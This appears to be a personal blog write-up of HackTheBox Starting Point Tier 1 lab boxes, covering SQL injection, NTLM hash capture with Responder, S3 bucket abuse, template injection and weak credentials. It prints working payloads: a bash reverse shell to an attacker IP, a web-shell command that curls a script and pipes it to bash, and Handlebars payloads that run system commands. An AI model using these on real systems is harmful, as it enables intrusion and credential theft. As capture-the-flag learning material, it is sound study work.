HackTheBox StartingPoint Tier 1

28-05-2024

This is the second collection of boxes designed as an introduction to HackTheBox

These are the second set of boxes on HackTheBox. I got stuck on Three for around a year when I got hit by a massive lack of motivation. However, I am back now, working through it all. I did find the range of difficulty in this room to be wild. Some of the boxes were as simple as a passwordless login to a service, and others took a lot of steps. Several of them I used the walkthrough for, but they did help me learn more about the box I was attacking.

Due to the length of the writeups here, I have added a contents to ease navigation.

  1. Appointment: A web application vulnerable to SQL injection
  2. Sequel: A vulnerable database service with weak credentials.
  3. Crocodile: An FTP service running with weak credentials
  4. Three: A website using a vulnerable S3 bucket for storage
  5. Ignition: A website with a vulnerable e-commerce platform
  6. Funnel: An insecure FTP service gives access to a machine with a PostgreSQL database
  7. Tactics: A Windows machine running an insecure SMB service

Appointment

In this box, there is a web server application running Apache on port 80. We can enumerate this using Gobuster, using the -x flag to specifically look for .php files. From there we can find a page called login.php, which we can then attempt to exploit. Following instructions telling us to log in without as admin without a password, we can use the following trick:

admin’#

The shown username value above works if there is no input sanitation and the log in system runs on an SQL database. Assuming the login code looks something like this

Allow log in where username = ‘username’ and password = ‘password’;

The single quote at the end of the username closes of the rest of the quote for the username string value, and then the #, which is a comment character in SQL, tells the program to ignore the rest of the line, allowing login without a password.

Back to top

Sequel

From our Nmap scan, we discover a MariaDB instance running on port 3306. This service allows us to log in as root without a password, which can be done using the following command:

mysql -u root -h [IP address] -p 3306

From there we can view the databases on the instance using:

SHOW DATABASES

It returns four databases; information_schema, mysql, performance_schema and htb. The first three databases are all default databases on MariaDB. From there we can see which tables can be accessed using

SHOW OPEN TABLES

and once we have located the necessary table, we can view its contents using:

SELECT * FROM [table]

Back to top

Crocodile

From our Nmap scan we can see that there is an FTP service and a HTTP service running on the box. Using the -sC flag with Nmap will use scripts to find more about the service, and in this case, return information on whether anonymous login to the FTP server is allowed. Seeing that it is, we can connect to the FTP instance and list the available files, which looks to include two that seem to be login credentials. After taking down the credential pair for the user “admin”, we can use Gobuster to find a login page on the website, and we can use the found credentials to gain access.

Back to top

Responder

We can enumerate the machine using the following command:

nmap -p- --min-rate 5000 -sV 10.129.147.104

In other versions of an nmap scan, the box was unresponsive, but this may have been an error on my part. The scan shows a machine running Windows as its operating system, having an Apache web server on port 80 and WinRM (Windows Remote Management) on port 5985.

Windows Remote Management is a Windows-native built-in remote management protocol that basically uses Simple Object Access Protocol to interact with remote computers and servers, as well as operating systems and applications. WinRM allows the user to:

When trying to access the given webserver, the website redirects to a new URL that the machine host doesn’t know how to find. This is because the web server is employing name-based Virtual Hosting for serving the requests. This is a method for hosting multiple domain names (with separate handling of each name) on a single server. This allows one server to share its resources, such as memory and processor cycles, without requiring all the services to be used by the same hostname. This can be fixed by running the following command

echo “[IP Address] [Domain name]” | sudo tee -a /etc/hosts

Once on the page can be accessed it can be seen that the web server uses different HTML files to provide different language options for the website. This presents an option for Local File Inclusion (LFI). One of the common files to test for LFI on Windows systems is the hosts file: WINDOWS\System32\drivers\etc\hosts (this file aids the local translation of host names to IP addresses). Using directory back travelling we can see that in this case, Local File Inclusion is possible.

As we know the page is vulnerable to file inclusion, there is a potential for including a file on our attacker workstation. Because it is a Windows machine, if we select a protocol like SMB, Windows will try to authenticate our machine and we can capture the NetNTLMv2.

In the PHP configuration file, php.ini, the allow_url_include wrapper is set to OFF by default, indicating that PHP does not load remote HTTP or FTP URLs to prevent remote file inclusion attacks. However, even if the URL allowing options are set to off, PHP will not prevent the loading of SMB URLs, and we can misuse this functionality to steal the NTLM hash. This can be done using Responder.

Responder can do many different types of attack, but for this scenario, we are going to use it to set up a malicious SMB server. When the target machine attempts to perform the NTLM authentication to that server, Responder sends a challenge back for the server to encrypt with the users password. While we can’t reverse this (it is hashed), we can use many different common passwords to try and find out the password.

Firstly when using Responder, we need to check the configuration file (Responder.conf) is set to listen to SMB requests (SMB should equal on). Once this configuration file is ready, we can proceed to start Responder with Python3, passing the interface to listen on using the -I flag:

sudo python3 Responder.py -I [attacker IP address]

Once the Responder server is ready, we tell the server to include a resource from our SMB server by setting the page parameter as follows

http[://]unika[.]htb/?page=//10[.]10[.]14[.]7/somefile

Because we have the freedom to specify the address for the SMB sharer, we specify the IP address of our attacking machine, meaning the server tries to load the resource from our SMB server. The page will return an error saying the file cannot be found, however the Responder server will have a NetNTLMv for the administrator user. This hash can be echoed into a txt file and then passed to John the Ripper:

john -w /usr/share/wordlists/rockyou.txt hash.txt

This returns that the admin password is “badminton”. We can use this to connect to the WinRM service and try to get a session. Because Powershell isn’t installed on Linux by default, we can use a tool called Evil-WinRM, which is made for this kind of scenario:

evil-winrm -i 10.129.147.104 -u administrator -p badminton

Back to top

Three

We can start by enumerating the target IP with an Nmap scan as follows:

sudo nmap -sV [target IP]

We can see an SSH service running on port 22 and a webpage running on port 80. We can check this web page out in our web browser and see it is the page of a band. In the contact form, there is an email with the domain thetoppers.htb. We can add an entry to /etc/hosts to be able to access this domain from the web browser. This is done with the following command:

echo “[IP Address] [Domain name]” | sudo tee -a /etc/hosts

Now we can check this domain for subdomains. A sub-domain is a piece of additional information added to the beginning of a website’s domain name. It allows websites to separate and organise content for a specific function, such as a blog or store, from the rest of your website. Often, different subdomains will have different IP addresses, so when our system goes to look up the subdomain, it gets the address of the server that handles the application. It is also possible to have one server handle multiple subdomains. This is accomplished via “host-based routing”, or “virtual host routing” where the server uses the Host header in the HTTP request to determine which application is meant to handle the request.

As we have the domain name, we can enumerate for subdomains with GoBuster, using the following command:

gobuster vhost -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http[://]thetoppers[.]htb

Almost immediately we get a result on s3.thetoppers.htb. We can add this to our /etc/hosts file to allow us to access it in the browser. When we visit this page the only thing displayed is

{“status”: “running”}

Googling the information we have so far shows that s3 is a cloud-based object storage service. It allows us to store things in containers called buckets. To interact with these buckets we need awscli. We can use aws configure to configure the connection. We need to put an arbitrary value into all the fields, as sometimes the server is not configured to check for authentication, but aws still needs a value in there to work. We can then list all the s3 buckets hosted on the server by using the ls command:

aws –endpoint=http[://]s3[.]thetoppers[.]htb s3 ls

We can also use the ls command to list objects and common prefixes under the specified bucket:

aws –endpoint=http[://]s3[.]thetoppers[.]htb s3 ls s3[://]thetoppers[.]htb

Using this command we can see that there are two files called .htaccess and index.php, and a directory called images. It is safe to assume that this is the webroot of the website running on port 80. This means the Apache server is using the S3 bucket as storage.

Awscli has got another feature that allows us to copy files to a remote bucket. We already know the website is using PHP. Thus, we can try uploading a PHP shell file to the s3 bucket, and since it’s uploaded to the webroot directory, we can visit this webpage in the browser, which will, in turn, execute this file and we will achieve remote code execution. The following PHP one-liner uses system() to take the URL parater ‘cmd’ as an input and executes it as a system command:

We can simply echo this into a file to get a shell file to upload. We can then use the following command to upload it to the bucket:

aws --endpoint=http[://]s3[.]thetoppers[.]htb s3 cp shell.php s3[://]thetoppers[.]htb

Navigating to http[://]s3[.]thetopper[.]htb/shell[.]php?cmd=id gives the output of the OS command id. This shows that we have remote code execution on the box. Now we can attempt to get a reverse shell. Through the reverse shell, we will trigger the remote host to connect back to our machine’s local IP address on the specified listening port. We can create a reverse shell shell.sh containing the following bash reverse shell payload. This will connect back to our local machine on port 1337.

#!/bin/bash
bash -i >& /dev/tcp/[IP address]/1337 0>&1

We can then set up a netcat listener on 1337 to catch the reverse shell. We also need to set up a HTTP server to serve the shell. These can be done with the following commands:

nc -nvlp 1337

python3 -m http.server 8000

We can use the curl facility to fetch the bash reverse shell file from our local host, and then pipe it to bash in order to execute it. This looks like this:

http[://]thetoppers[.]htb/shell.php?cmd=curl%20[IP address]:8000/shell.sh|bash

From there we can navigate and find the flag.

Back to top

Ignition

We can enumerate the target to find a service running on port 80. It is nginx 1.14.2. Visiting the IP in browser just gives a Server Not Found error. We can try the following command to access the contents of the page:

curl -v http[://][ip address]

This returns a HTTP status code of 302. This "response code means that the URI of requested resource has been changed temporarily. Further changes in the URI might be made in the future. Therefore, this same URI should be used by the client in future requests.”. Putting the IP address in the browser shows that it expects to be visited using the virtual host name ignition.htb. We can add an entry to /etc/hosts to tie the IP address and the virtual host name together. This can be done with the following line:

echo “[IP Address] [Domain name]” | sudo tee -a /etc/hosts

Doing this allows us to access the homepage for something called Luma. We can try and brute-force directories on the webpage using Gobuster. The command is as follows:

gobuster dir –u http[://]ignition[.]htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

From there, we can find a page called admin, which sounds worth investigating. If we put it in the address bar, we get taken to a login page for a service called Magento, which is an open-source e-commerce platform. From here we can look at the most common passwords for 2023, and just try those until we get one right, which lets us log into the admin page and collect the flag.

Back to top

Bike

We start with an nmap scan of the endpoint. There are 2 services running, SSH on port 22 and a HTTP service on port 80. The service on port 80 is run by Node.js, with Wappalyzer identifying the web framework as Express.

We can test for Server Side Template Injection by putting {{7*7}} into the input box and seeing what happens. In this case we get a long JSON error. From the error message, we can see that Handlebars is the templating engine being used within Node.js.

We can then look on HackTricks to find a Server Site Template Injection payload for Handlebars. If we URL encode it and put it in the email entry, we get a new error saying “require is not defined”.

{{this.push "return require('child_process').exec('whoami');"}}

This is the section of code using the require. It is attempting to load the Child Process into memory and use it to execute commands. As require doesn’t work, we need to find a way around it. We can Google the top level scope in Node.js and find it is called global. If we then Google “Node.js global scope” we can find that require isn’t actually a global, and is instead local. Scrolling up the global documentation we can find an object called process which is global and can be used anywhere. Scrolling through the process documentation, we can find that process.mainModule can be an alternative way to retrieve require.main, which is hopeful. Including the following line in the payload can help us test if process.mainModule will return an error.

{{this.push "return process.mainModule;"}}

The output from the payload does not include an error, which is a great sign. We can then try and require the child process through the mainModule like so:

{{this.push "return process.mainModule.require(‘child_process’);"}}

This also doesn’t return an error, so we can start executing commands in the same way as previously:

{{this.push "return process.mainModule.require('child_process').execSync('whoami');"}}

Then, we can submit a placeholder into the email field and catch the HTTP request in BurpSuite. We can then replace our placeholder in the email field with our URL encoded payload. The whoami command returns root. We can then change whoami to ls /root to see what is in the root directory. Its output includes flag.txt, which we can read with cat to get the flag.

Back to top

Funnel

We start with an nmap scan on the given IP address. This shows a FTP service on port 21, and an SSH service on port 22. We can connect to the FTP service with the following command:

ftp [IP address]

From there, anonymous log in is enabled, so we can just log in with the anonymous username/password combo. From there we can use ls to see what directories are available. There is one called mail_backup. We can move into it and list again to see what is in there. There is a copy of an email sent to a couple recipients, welcoming them to the company “Funnel”. The accompanying PDF covers the company’s password policy, including their default password. We can take the names from the emails and attempt to use them alongside the default password to see if we can SSH in. We can. Thanks Christine. From there we can use the following command to list listening ports on the machine:

ss -tl

From there, we can see a PostgreSQL service, which listens on port 5432 as standard. We can’t access this service from the machine, so we need to create a tunnel and connect to it from our own machine. This is local port forwarding. The command is as follows:

ssh -L 1234:localhost:5432 christine@[target IP]

or

ssh -L [local port]:[destination IP]:[destination port] [user]@[target IP]

This is run on our own machine (hence the name local port forwarding. We also need to install the PostgreSQL software so we can interact with it. This can also be done on our local machine using the following command:

sudo apt update && sudo apt install psql

From there, once we have our local port forward up, we can list all the existing databases on the service with \list. Then we connect to the one we want, in this case secrets with \connect secrets. We can then list the database tables using the \dt command, and dump its contents using a standard SQL query:

SELECT * FROM flag

This gives us the flag.

Back to top

Funnel

We begin with a scan of the target. This reveals there is a service running on port 8080. It is Jetty 9.4.39.v20210325. As it is a HTTP service, we can visit it in the browser using the following address:

http[://][target IP][:]8080

The page we are brought to says “Welcome to Jenkins”. A quick google reveals that Jenkins is “the leading open source automation server, Jenkins provides hundreds of plugins to support building, deploying and automating any project”. We are presented with a login page, we can spray common weak credentials until we manage to log in with “root/password”. Once we are in we can see a user interface that is like a file hub. It looks like it accepts Groovy scripts. A quick google for Groovy reverse shells gives us some code we can upload.

We need to change the host to our own IP, and the command to /bin/bash because we are targeting a Linux machine not a Windows machine. We also set up a nectcat listener on our own machine to catch the reverse shell. This has to listen on port 8044. Once we catch the shell, we can run whoami to see what privileges we have. Once we confirm we have root privileges, we can list the /root directory, find flag.txt and read it to get the flag.

Back to top

Tactics

We start out with an nmap scan with the -sV flag. This responds saying the host seems to be down and to try the -Pn flag. This responds with a msrpc service on port 135, a netbios-ssn service on port 139 and a microsoft-ds service on port 445. Given the box is about SMB, we can focus on that port first. We’re going to attempt to log into the SMB client as the Adminstrator, given that its a high privilege account on Windows. This can be done using the following command:

smbclient -L [IP address] -U Administrator

Then it prompts us for a password and we just hit enter and hope for the best. It lets us in. From there we can see three shares with a $ at the end. This indicates an administrative share. We can navigate into a share using the following command:

smbclient \\\\[IP address]\\[Share name] -U Administrator

In this case I chose the C$ share, as this likely represents a windows file system. Once in the share we can navigate through the Users folder to the admistrator’s desktop, where the flag sits. From there we can get it onto our own system using get. Then we can read it and submit it.